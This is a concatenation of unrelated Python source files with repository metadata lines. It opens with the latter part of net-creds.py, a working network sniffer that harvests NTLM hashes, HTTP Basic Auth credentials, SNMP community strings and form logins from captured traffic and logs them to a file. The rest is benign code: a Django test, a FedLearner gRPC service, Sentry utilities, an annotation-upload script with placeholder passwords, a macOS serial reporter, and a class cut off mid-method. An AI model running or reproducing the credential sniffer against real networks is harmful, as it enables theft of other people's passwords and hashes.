parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
        # some ad sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
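# A minimal illustrative sketch of get_http_searches() on a fabricated search
# request; the host and query string are invented and this helper is never
# called by the tool itself.
def _demo_get_http_searches():
    url = 'GET www.example.com/search?q=foo+bar'
    # Returns 'Searched www.example.com: foo bar'
    return get_http_searches(url, '', 'www.example.com')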
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
basic_auth_creds = base64.decodestring(basic_auth_b64)
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
# Incomprehensible list comprehension flattens list of headers
# that are each split at ': '
# http://stackoverflow.com/a/406296
headers_list = [x for line in header_lines for x in line.split(': ', 1)]
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
# Make the header key (like "Content-Length") lowercase
for header in headers_dict:
headers[header.lower()] = headers_dict[header]
return headers
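# A minimal illustrative sketch of headers_to_dict() flattening raw header
# lines into a lowercase-keyed dict; the header values are fabricated and this
# helper is never called by the tool itself.
def _demo_headers_to_dict():
    hdrs = headers_to_dict(['Host: example.com', 'Content-Type: text/html'])
    # hdrs == {'host': 'example.com', 'content-type': 'text/html'}
    return hdrs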
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different than requests e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and password
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
msg2 = header_val2[1]
msg2 = base64.decodestring(msg2)
        parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
msg_type = struct.unpack("<I",msg2[8:12])[0]
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
                  'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password',
'passwort', 'passwrd', 'wppassword', 'upasswd']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[%s > %s] %s%s%s' % (src_ip_port, dst_ip_port, T, msg, W)
# All credentials will have dst_ip_port, URLs will not
# Prevent identical outputs unless it's an HTTP search or POST load
skip = ['Searched ', 'POST load:']
for s in skip:
if s not in msg:
if os.path.isfile('credentials.txt'):
with open('credentials.txt', 'r') as log:
contents = log.read()
if msg in contents:
return
print print_str
# Escape colors like whatweb has
ansi_escape = re.compile(r'\x1b[^m]*m')
print_str = ansi_escape.sub('', print_str)
# Log the creds
logging.info(print_str)
else:
print_str = '[%s] %s' % (src_ip_port.split(':')[0], msg)
print print_str
def main(args):
##################### DEBUG ##########################
## Hit Ctrl-C while program is running and you can see
## whatever variable you want within the IPython cli
## Don't forget to uncomment IPython in imports
#def signal_handler(signal, frame):
# embed()
## sniff(iface=conf.iface, prn=pkt_parser, store=0)
# sys.exit()
#signal.signal(signal.SIGINT, signal_handler)
######################################################
# Read packets from either pcap or interface
if args.pcap:
try:
pcap = rdpcap(args.pcap)
except Exception:
exit('[-] Could not open %s' % args.pcap)
for pkt in pcap:
pkt_parser(pkt)
else:
# Check for root
if geteuid():
exit('[-] Please run as root')
#Find the active interface
if args.interface:
conf.iface = args.interface
else:
conf.iface = iface_finder()
print '[*] Using interface:', conf.iface
if args.filterip:
sniff(iface=conf.iface, prn=pkt_parser, filter="not host %s" % args.filterip, store=0)
else:
sniff(iface=conf.iface, prn=pkt_parser, store=0)
if __name__ == "__main__":
main(parse_args())
| jorik041/net-creds | net-creds.py | Python | gpl-3.0 | 36,772 |
from StringIO import StringIO
from django.test import TestCase
from mock import patch
from core.management.commands import run_docker
from projects.models import Project
from builds.models import Version
class TestRunDocker(TestCase):
'''Test run_docker command with good input and output'''
fixtures = ['test_data']
def setUp(self):
self.project = Project.objects.get(slug='pip')
self.version = Version(slug='foo', verbose_name='foobar')
self.project.versions.add(self.version)
def _get_input(self, files=None):
return ('{"project": {"id": 6, "name": "Pip", "slug": "pip"},'
'"id": 71, "type": "tag", "identifier": "437fb316fbbdba1acdd22e07dbe7c4809ffd97e6",'
'"verbose_name": "stable", "slug": "stable"}')
def _docker_build(data):
if isinstance(data, Version):
return {'html': (0, 'DOCKER PASS', '')}
else:
return {'html': (1, '', 'DOCKER FAIL')}
def test_stdin(self):
'''Test docker build command'''
def _input(_, files=None):
return '{"test": "foobar"}'
with patch.object(run_docker.Command, '_get_input', _input):
cmd = run_docker.Command()
assert cmd._get_input() == '{"test": "foobar"}'
@patch.object(run_docker.Command, '_get_input', _get_input)
@patch('projects.tasks.docker_build', _docker_build)
@patch('sys.stdout', new_callable=StringIO)
def test_good_input(self, mock_output):
'''Test docker build command'''
cmd = run_docker.Command()
self.assertEqual(cmd._get_input(), self._get_input())
cmd.handle()
self.assertEqual(
mock_output.getvalue(),
'{"html": [0, "DOCKER PASS", ""]}\n'
)
@patch('projects.tasks.docker_build', _docker_build)
def test_bad_input(self):
'''Test docker build command'''
with patch.object(run_docker.Command, '_get_input') as mock_input:
with patch('sys.stdout', new_callable=StringIO) as mock_output:
mock_input.return_value = 'BAD JSON'
cmd = run_docker.Command()
cmd.handle()
self.assertEqual(
mock_output.getvalue(),
('{"doc_builder": '
'[-1, "", "ValueError: No JSON object could be decoded"]}'
'\n')
)
| takluyver/readthedocs.org | readthedocs/rtd_tests/tests/test_core_management.py | Python | mit | 2,433 |
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import logging
from concurrent import futures
import grpc
from google.protobuf import empty_pb2
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_portal_service_pb2 as dp_pb
from fedlearner.common import data_portal_service_pb2_grpc as dp_grpc
from fedlearner.common.db_client import DBClient
from fedlearner.data_join.data_portal_job_manager import DataPortalJobManager
from fedlearner.data_join.routine_worker import RoutineWorker
class DataPortalMaster(dp_grpc.DataPortalMasterServiceServicer):
def __init__(self, portal_name, kvstore, portal_options):
super(DataPortalMaster, self).__init__()
self._portal_name = portal_name
self._kvstore = kvstore
self._portal_options = portal_options
self._data_portal_job_manager = DataPortalJobManager(
self._kvstore, self._portal_name,
self._portal_options.long_running,
self._portal_options.check_success_tag,
self._portal_options.single_subfolder,
self._portal_options.files_per_job_limit,
start_date=self._portal_options.start_date,
end_date=self._portal_options.end_date
)
self._bg_worker = None
def GetDataPortalManifest(self, request, context):
return self._data_portal_job_manager.get_portal_manifest()
def RequestNewTask(self, request, context):
response = dp_pb.NewTaskResponse()
finished, task = \
self._data_portal_job_manager.alloc_task(request.rank_id)
if task is not None:
if isinstance(task, dp_pb.MapTask):
response.map_task.MergeFrom(task)
else:
assert isinstance(task, dp_pb.ReduceTask)
response.reduce_task.MergeFrom(task)
elif not finished:
response.pending.MergeFrom(empty_pb2.Empty())
else:
response.finished.MergeFrom(empty_pb2.Empty())
return response
def FinishTask(self, request, context):
self._data_portal_job_manager.finish_task(request.rank_id,
request.partition_id,
request.part_state)
return common_pb.Status()
def start(self):
self._bg_worker = RoutineWorker(
'portal_master_bg_worker',
self._data_portal_job_manager.backgroup_task,
lambda: True, 30
)
self._bg_worker.start_routine()
def stop(self):
if self._bg_worker is not None:
self._bg_worker.stop_routine()
self._bg_worker = None
class DataPortalMasterService(object):
def __init__(self, listen_port, portal_name,
kvstore_type, portal_options):
self._portal_name = portal_name
self._listen_port = listen_port
self._server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
kvstore = DBClient(kvstore_type, portal_options.use_mock_etcd)
self._data_portal_master = DataPortalMaster(portal_name, kvstore,
portal_options)
dp_grpc.add_DataPortalMasterServiceServicer_to_server(
self._data_portal_master, self._server
)
self._server.add_insecure_port('[::]:%d'%listen_port)
self._server_started = False
def start(self):
if not self._server_started:
self._server.start()
self._data_portal_master.start()
self._server_started = True
logging.warning("DataPortalMasterService name as %s start " \
"on port[%d]:",
self._portal_name, self._listen_port)
def stop(self):
if self._server_started:
self._data_portal_master.stop()
self._server.stop(None)
self._server_started = False
logging.warning("DataPortalMasterService name as %s"\
"stopped ", self._portal_name)
def run(self):
self.start()
self._server.wait_for_termination()
self.stop()
| bytedance/fedlearner | fedlearner/data_join/data_portal_master.py | Python | apache-2.0 | 4,823 |
from __future__ import absolute_import, print_function
import collections
import logging
import six
from django.conf import settings
from django.db import transaction
from django.utils.encoding import force_text
from sentry.utils import json
from sentry.utils.strings import truncatechars
def safe_execute(func, *args, **kwargs):
# TODO: we should make smart savepoints (only executing the savepoint server
# side if we execute a query)
_with_transaction = kwargs.pop("_with_transaction", True)
expected_errors = kwargs.pop("expected_errors", None)
_passthrough_errors = kwargs.pop("_passthrough_errors", None)
try:
if _with_transaction:
with transaction.atomic():
result = func(*args, **kwargs)
else:
result = func(*args, **kwargs)
except Exception as e:
if _passthrough_errors and isinstance(e, _passthrough_errors):
raise
if hasattr(func, "im_class"):
cls = func.im_class
else:
cls = func.__class__
func_name = getattr(func, "__name__", six.text_type(func))
cls_name = cls.__name__
logger = logging.getLogger("sentry.safe.%s" % (cls_name.lower(),))
if expected_errors and isinstance(e, expected_errors):
logger.info("%s.process_error_ignored", func_name, extra={"exception": e})
return
logger.error("%s.process_error", func_name, exc_info=True, extra={"exception": e})
else:
return result
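# A minimal illustrative sketch of safe_execute() swallowing exceptions.
# _with_transaction is disabled so no database is needed; the lambdas are
# fabricated examples and this helper is never called by the library itself.
def _demo_safe_execute():
    assert safe_execute(lambda x: x + 1, 41, _with_transaction=False) == 42
    # The ZeroDivisionError is logged and swallowed, so None comes back
    assert safe_execute(lambda: 1 / 0, _with_transaction=False) is None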
def trim(
value,
max_size=settings.SENTRY_MAX_VARIABLE_SIZE,
max_depth=6,
object_hook=None,
_depth=0,
_size=0,
**kwargs
):
"""
Truncates a value to ```MAX_VARIABLE_SIZE```.
The method of truncation depends on the type of value.
"""
options = {
"max_depth": max_depth,
"max_size": max_size,
"object_hook": object_hook,
"_depth": _depth + 1,
}
if _depth > max_depth:
if not isinstance(value, six.string_types):
value = json.dumps(value)
return trim(value, _size=_size, max_size=max_size)
elif isinstance(value, dict):
result = {}
_size += 2
for k in sorted(value.keys()):
v = value[k]
trim_v = trim(v, _size=_size, **options)
result[k] = trim_v
_size += len(force_text(trim_v)) + 1
if _size >= max_size:
break
elif isinstance(value, (list, tuple)):
result = []
_size += 2
for v in value:
trim_v = trim(v, _size=_size, **options)
result.append(trim_v)
_size += len(force_text(trim_v))
if _size >= max_size:
break
if isinstance(value, tuple):
result = tuple(result)
elif isinstance(value, six.string_types):
result = truncatechars(value, max_size - _size)
else:
result = value
if object_hook is None:
return result
return object_hook(result)
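# A minimal illustrative sketch of trim() on strings; the explicit max_size
# values are chosen only for the example and this helper is never called by
# the library itself.
def _demo_trim():
    assert trim("abc", max_size=1000) == "abc"
    # A 10000-char string is cut down to roughly max_size characters
    assert len(trim("x" * 10000, max_size=512)) <= 512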
def trim_pairs(iterable, max_items=settings.SENTRY_MAX_DICTIONARY_ITEMS, **kwargs):
max_items -= 1
result = []
for idx, item in enumerate(iterable):
key, value = item
result.append((key, trim(value, **kwargs)))
if idx > max_items:
return result
return result
def trim_dict(value, max_items=settings.SENTRY_MAX_DICTIONARY_ITEMS, **kwargs):
max_items -= 1
for idx, key in enumerate(list(iter(value))):
value[key] = trim(value[key], **kwargs)
if idx > max_items:
del value[key]
return value
def get_path(data, *path, **kwargs):
"""
Safely resolves data from a recursive data structure. A value is only
returned if the full path exists, otherwise ``None`` is returned.
If the ``default`` argument is specified, it is returned instead of ``None``.
If the ``filter`` argument is specified and the value is a list, it is
filtered with the given callback. Alternatively, pass ``True`` as filter to
only filter ``None`` values.
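    Illustrative examples (added; not part of the original docstring):
    >>> get_path({"a": {"b": 1}}, "a", "b")
    1
    >>> get_path({"a": None}, "a", "b", default=0)
    0
    >>> get_path({"a": [None, 1]}, "a", filter=True)
    [1]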
"""
default = kwargs.pop("default", None)
f = kwargs.pop("filter", None)
for k in kwargs:
raise TypeError("set_path() got an undefined keyword argument '%s'" % k)
for p in path:
if isinstance(data, collections.Mapping) and p in data:
data = data[p]
elif isinstance(data, (list, tuple)) and -len(data) <= p < len(data):
data = data[p]
else:
return default
if f and data and isinstance(data, (list, tuple)):
data = list(filter((lambda x: x is not None) if f is True else f, data))
return data if data is not None else default
def set_path(data, *path, **kwargs):
"""
Recursively traverses or creates the specified path and sets the given value
argument. `None` is treated like a missing value. If a non-mapping item is
encountered while traversing, the value is not set.
This function is equivalent to a recursive dict.__setitem__. Returns True if
the value was set, otherwise False.
    If the ``overwrite`` kwarg is set to False, the value is only set if there is
no existing value or it is None. See ``setdefault_path``.
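    Illustrative example (added; not part of the original docstring):
    >>> d = {}
    >>> set_path(d, "a", "b", value=1)
    True
    >>> d
    {'a': {'b': 1}}
    >>> set_path(d, "a", "b", value=2, overwrite=False)
    False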
"""
try:
value = kwargs.pop("value")
except KeyError:
raise TypeError("set_path() requires a 'value' keyword argument")
overwrite = kwargs.pop("overwrite", True)
for k in kwargs:
raise TypeError("set_path() got an undefined keyword argument '%s'" % k)
for p in path[:-1]:
if not isinstance(data, collections.Mapping):
return False
if data.get(p) is None:
data[p] = {}
data = data[p]
if not isinstance(data, collections.Mapping):
return False
p = path[-1]
if overwrite or data.get(p) is None:
data[p] = value
return True
return False
def setdefault_path(data, *path, **kwargs):
"""
Recursively traverses or creates the specified path and sets the given value
argument if it does not exist. `None` is treated like a missing value. If a
non-mapping item is encountered while traversing, the value is not set.
This function is equivalent to a recursive dict.setdefault, except for None
values. Returns True if the value was set, otherwise False.
"""
kwargs["overwrite"] = False
return set_path(data, *path, **kwargs)
| mvaled/sentry | src/sentry/utils/safe.py | Python | bsd-3-clause | 6,439 |
# The MIT License (MIT)
# Copyright (c) 2014-2015 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# === EDIT ====================================================================
SERVER = 'http://localhost:12345'
ROOT_PASSWORD = 'password'
# admin username and password
ADMIN = 'administrator'
ADMIN_PASSWORD = 'password'
# template of path to video files (relative to /media)
URL = 'REPERE/phase2/test/{name}'
# =============================================================================
from camomile import Camomile
client = Camomile(SERVER)
# login as root
client.login('root', ROOT_PASSWORD)
# create new admin user
admin = client.createUser(ADMIN, ADMIN_PASSWORD, role='admin', returns_id=True)
# login as admin
client.login(ADMIN, ADMIN_PASSWORD)
# create new corpus
corpus = client.createCorpus('REPERE', returns_id=True)
# add media to corpus and keep track of their IDs
mediaID = {}
with open('media.lst', 'r') as f:
for medium in f:
# remove trailing "\n"
name = medium.strip()
# create medium
mediaID[name] = client.createMedium(
corpus, name, url=URL.format(name=name), returns_id=True)
# parse sample annotation files
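# Each annotation line is expected to look like (illustrative format, inferred
# from the token indices used below):
#   "<medium-name> <start-time> <end-time> <unused> <label>"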
def parse(path, mediaID):
annotations = []
with open(path, 'r') as f:
for line in f:
# remove trailing "\n" and split on spaces
tokens = line.strip().split()
# get medium ID
mediumName = tokens[0]
id_medium = mediaID[mediumName]
# get fragment start and end times
startTime = float(tokens[1])
endTime = float(tokens[2])
# get data
label = tokens[4]
annotation = {'fragment': {'start': startTime, 'end': endTime},
'data': label,
'id_medium': id_medium}
# append annotations to the list
annotations.append(annotation)
return annotations
# create reference layer
annotations = parse('reference.repere', mediaID)
reference = client.createLayer(
corpus, 'reference',
fragment_type='segment',
data_type='label',
annotations=annotations,
returns_id=True)
# create hypothesis layers
for i in [2]:
path = 'hypothesis{i}.repere'.format(i=i)
annotations = parse(path, mediaID)
hypothesis = client.createLayer(
corpus,
'hypothesis {i}'.format(i=i),
fragment_type='segment',
data_type='label',
annotations=annotations,
returns_id=True)
| camomile-project/camomile-client-python | example/populate.py | Python | mit | 3,552 |
#!/usr/bin/python
# Copyleft 2010, Daniel Beecham <joshu@lunix.se>
# All rights reversed.
"""This module will get and send Mac serial, system build and Mac OS X version."""
import cnf
import commands
import urllib
import sys
import re
def main():
"""servermonitor.mac main function."""
if sys.platform == 'darwin':
if not cnf.quiet:
print "Serial+Build: ",
# Get serial number
serial = commands.getoutput('/usr/sbin/ioreg -l | /usr/bin/grep IOPlatformSerialNumber')
serial = re.search(r'IOPlatformSerialNumber" = "([^"]+)', serial).group(1)
# Get Mac OS X version and system build
sw_vers = commands.getoutput('sw_vers')
osx_version = sw_vers.split(':')[2].split('\n')[0].replace('\t','')
build_version = sw_vers.split(':')[3].replace('\t','')
# Make it a dict along with id and password.
data = {'serial':serial, 'build_version':build_version, 'osx_version':osx_version,'id':cnf.id, 'password':cnf.password}
# And send it.
handle = urllib.urlopen(cnf.addr + "/handlers/mac.php", urllib.urlencode(data))
if not cnf.quiet:
print handle.read()
# vim: expandtab tabstop=4 shiftwidth=4
| jhaals/servermonitor | modules/mac.py | Python | bsd-3-clause | 1,236 |
# Copyright 2015, 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ._base import Config, ConfigError
from synapse.appservice import ApplicationService
from synapse.types import UserID
import urllib
import yaml
import logging
logger = logging.getLogger(__name__)
class AppServiceConfig(Config):
def read_config(self, config):
self.app_service_config_files = config.get("app_service_config_files", [])
self.notify_appservices = config.get("notify_appservices", True)
def default_config(cls, **kwargs):
return """\
        # A list of application service config files to use
app_service_config_files: []
"""
def load_appservices(hostname, config_files):
"""Returns a list of Application Services from the config files."""
if not isinstance(config_files, list):
logger.warning(
"Expected %s to be a list of AS config files.", config_files
)
return []
# Dicts of value -> filename
seen_as_tokens = {}
seen_ids = {}
appservices = []
for config_file in config_files:
try:
with open(config_file, 'r') as f:
appservice = _load_appservice(
hostname, yaml.load(f), config_file
)
if appservice.id in seen_ids:
raise ConfigError(
"Cannot reuse ID across application services: "
"%s (files: %s, %s)" % (
appservice.id, config_file, seen_ids[appservice.id],
)
)
seen_ids[appservice.id] = config_file
if appservice.token in seen_as_tokens:
raise ConfigError(
"Cannot reuse as_token across application services: "
"%s (files: %s, %s)" % (
appservice.token,
config_file,
seen_as_tokens[appservice.token],
)
)
seen_as_tokens[appservice.token] = config_file
logger.info("Loaded application service: %s", appservice)
appservices.append(appservice)
except Exception as e:
logger.error("Failed to load appservice from '%s'", config_file)
logger.exception(e)
raise
return appservices
def _load_appservice(hostname, as_info, config_filename):
required_string_fields = [
"id", "as_token", "hs_token", "sender_localpart"
]
for field in required_string_fields:
if not isinstance(as_info.get(field), basestring):
raise KeyError("Required string field: '%s' (%s)" % (
field, config_filename,
))
# 'url' must either be a string or explicitly null, not missing
# to avoid accidentally turning off push for ASes.
if (not isinstance(as_info.get("url"), basestring) and
as_info.get("url", "") is not None):
raise KeyError(
"Required string field or explicit null: 'url' (%s)" % (config_filename,)
)
localpart = as_info["sender_localpart"]
if urllib.quote(localpart) != localpart:
raise ValueError(
"sender_localpart needs characters which are not URL encoded."
)
user = UserID(localpart, hostname)
user_id = user.to_string()
# Rate limiting for users of this AS is on by default (excludes sender)
rate_limited = True
if isinstance(as_info.get("rate_limited"), bool):
rate_limited = as_info.get("rate_limited")
# namespace checks
if not isinstance(as_info.get("namespaces"), dict):
raise KeyError("Requires 'namespaces' object.")
for ns in ApplicationService.NS_LIST:
# specific namespaces are optional
if ns in as_info["namespaces"]:
# expect a list of dicts with exclusive and regex keys
for regex_obj in as_info["namespaces"][ns]:
if not isinstance(regex_obj, dict):
raise ValueError(
"Expected namespace entry in %s to be an object,"
" but got %s", ns, regex_obj
)
if not isinstance(regex_obj.get("regex"), basestring):
raise ValueError(
"Missing/bad type 'regex' key in %s", regex_obj
)
if not isinstance(regex_obj.get("exclusive"), bool):
raise ValueError(
"Missing/bad type 'exclusive' key in %s", regex_obj
)
# protocols check
protocols = as_info.get("protocols")
if protocols:
        # Strings are iterable too, so explicitly reject them when requiring a list
if isinstance(protocols, str) or not isinstance(protocols, list):
raise KeyError("Optional 'protocols' must be a list if present.")
for p in protocols:
if not isinstance(p, str):
raise KeyError("Bad value for 'protocols' item")
if as_info["url"] is None:
logger.info(
"(%s) Explicitly empty 'url' provided. This application service"
" will not receive events or queries.",
config_filename,
)
return ApplicationService(
token=as_info["as_token"],
url=as_info["url"],
namespaces=as_info["namespaces"],
hs_token=as_info["hs_token"],
sender=user_id,
id=as_info["id"],
protocols=protocols,
rate_limited=rate_limited
)
| TribeMedia/synapse | synapse/config/appservice.py | Python | apache-2.0 | 6,118 |
from dic.experiment import Experiment
from dic.plots import generate_plots
'''This script generates data for a given experiment condition and plots it in
a single figure. Plotting options are:
polar: Plots in polar coordinates if true, otherwise Cartesian.
areaplot: Plots the "error area" (\gamma*\sigma_gamma*\sigma_theta) if true,
otherwise, creates 4x4 variable-specific plots
show: Displays the figure if true, otherwise does not. Used when saving.'''
experiment = Experiment(lens=40,
weak_grad=False,
lamda=546,
approaches=['A: 2x2', 'A: 2x3', 'B: 2x3', 'B: 2x4'],
k=1e2,
fromZero=True,
save=False,
filepath=None)
sigma_g, sigma_t = experiment.generate_data(sample_size=100)
generate_plots(sigma_g, sigma_t, experiment,
polar=True,
areaplot=True,
SNR=False,
report=False,
show=True)
| scott-trinkle/DIC | main.py | Python | mit | 1,049 |
import random
class Crop:
    # Constructor
def __init__(self, growth_rate, light_need, water_need):
        # Attributes
self._growth = 0
self._days_growing = 0
self._growth_rate = growth_rate
self._light_need = light_need
self._water_need = water_need
self._status = "Seed"
self._type = "Generic"
    # Dictionary with the water and light needs
def needs(self):
return {'light need':self._light_need, 'water need':self._water_need}
    # Dictionary with the crop's current state
def report(self):
